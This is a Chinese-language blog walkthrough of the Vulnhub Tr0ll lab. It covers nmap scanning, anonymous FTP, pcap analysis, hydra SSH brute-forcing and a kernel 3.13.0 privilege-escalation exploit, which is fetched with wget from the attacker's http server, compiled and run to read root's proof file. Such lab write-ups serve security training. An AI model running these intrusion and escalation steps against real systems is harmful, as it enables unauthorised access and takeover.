freeBuf
主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

Vulnhub靶场 4-Tr0ll
liumuu 2024-02-18 21:24:38 141465

Namp -sP 192.168.136.0/24确定目标ip,nmap -p- -sS -sV -A 192.168.136.134扫端口

1708261744_65d20170e2c82b65cc798.png!small

1708261752_65d201785913fedb6a70e.png!small

这里允许ftp匿名登录

通过21端口ftp服务进行渗透,匿名登陆

ftp + 对方ip地址

账号和密码都使用Anonymous

1708261779_65d201939e26507dd99ee.png!small

ftp中使用dir查看有哪些文件

1708261797_65d201a5557032e501191.png!small

使用get+文件名下载文件到本机

1708261819_65d201bb0bb21ab18b3de.png!small

pcap是wireshark配置脚本文件,流量文件,直接打开会显示乱码,使用wireshark进行分析

用wireshark打开文件

1708261849_65d201d9e1ec1ea2a5117.png!small

选择一个右键追踪tcp流

1708261875_65d201f31120167b076e4.png!small

1708261883_65d201fbe17c94198b1f3.png!small

为什么要追踪tcp流呢,因为刚刚是通过ftp下载的文件,ftp是tcp协议

1708261898_65d2020a7959b5be68777.png!small

1708261906_65d2021298eb230dd05e7.png!small

过滤第一条流,右键追踪tcp流,看到有个文件

1708261921_65d20221b1a71069a6680.png!small

通常访问文件是通过浏览器访问,用浏览器访问ip

1708261936_65d20230c63c189a11aa4.png!small

对目录进行爆破

爆破不出什么

1708261984_65d2026077f1a89349e78.png!small

过滤第二条流

1708262000_65d20270da0ec7632d4ac.png!small

1708262009_65d20279724235ee2824c.png!small

这里得到一些信息,大致意思是差点找到

好吧,好吧,好吧,你不就是一个聪明的小恶魔吗,你差点找到了 sup3rs3cr3tdirlol :-P

糟透了,你离得太近了......必须更加努力!

得到一个目录sup3rs3cr3tdirlol

放到浏览器url后面

1708262028_65d2028cd1c5591256079.png!small

点击第二个,结果是进行下载

1708262041_65d20299a1c33062bd4af.png!small

得到这个文件

1708262053_65d202a58e6f17bd99a91.png!small

但不知道这个文件是用什么软件打开的,什么类型,kali自带一个file跟文件名的指令是判断当前文件是什么类型

1708262066_65d202b27d06bc61292e0.png!small

是32位ELF二进制文件

Kali可以通过strings打开二进制文件,strings 命令在对象文件或二进制文件中查找可打印的字符串。

1708262078_65d202bec006077bea95f.png!small

找到0x0856BF继续,复制到浏览器后面

1708262089_65d202c9bb4ddbcc7a998.png!small

找到目录

1708262100_65d202d49e2d6ae407504.png!small

得到gook_luck文件里面疑是用户名,下面的文件是密码

1708262113_65d202e10d8cfcf791461.png!small

这个文件名也可能是密码

1708262124_65d202ecc2a49107a5e43.png!small

现在得到用户名和密码,则用来爆破22端口的ssh服务,将得到用户名和密码新建文件粘贴进去

1708262135_65d202f79f0908e01f267.png!small

爆破需要用到九头蛇软件

hydra -L user.txt -p Pass.txt 192.168.136.134 ssh

1708262148_65d203049b5e533ff6a2a.png!small

得到正确的用户名和密码

使用ssh 用户名@ip,再输入密码就OK了,连接上了

1708262161_65d20311930457d810e02.png!small

输入python指令,稳定shell

1708262173_65d2031d0f97aa1574df7.png!small

使用内核版本进行提权,查找版本的指令是uname -a

1708262188_65d2032cc88b735d6397a.png!small

在kali中找到对应linux版本的exp,通过searchsploit Kernel 3.13.0查找版本为3.13.0的exp

Kernel是内核的意思

1708262204_65d2033cf1871c6306aa5.png!small

找到对应的exp

1708262218_65d2034a3b1f728a61dde.png!small

选择.c后缀的文件,因为是可执行文件

1708262230_65d2035633adcc0693af9.png!small

找到文件的绝对路径,使用locate指令

1708262242_65d203628116e69e62779.png!small

复制到桌面上

1708262254_65d2036e2d855423c6998.png!small

开启http服务

1708262264_65d20378e036853e4b2d9.png!small

服务器切记要切换到tmp文件夹下,不然没权限

1708262286_65d2038ee530812afdb25.png!small

wget http://192.168.136.131:8081/37292.c

下载成功

1708262299_65d2039b37cb39f2382da.png!small

.c后缀的文件需要编译后才能执行,使用gcc 37292.c -o caicai

Gcc 文件名 -o 编译后的文件名

编译完后,赋可执行权限,执行文件

1708262313_65d203a99f4d52bf5aa16.png!small

1708262319_65d203af4e3c1b32525aa.png!small

得到权限1708262329_65d203b9a4578f1753348.png!small

查看root文件夹下的proof.txt文件

1708262345_65d203c99b6e392fe2558.png!small

# 漏洞 # 渗透测试
本文为 liumuu 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
liumuu LV.3
这家伙太懒了,还未填写个人描述!
  • 6 文章数
  • 2 关注者
xss总结
2025-01-14
文件上传通关攻略
2025-01-14
SQL注入
2025-01-14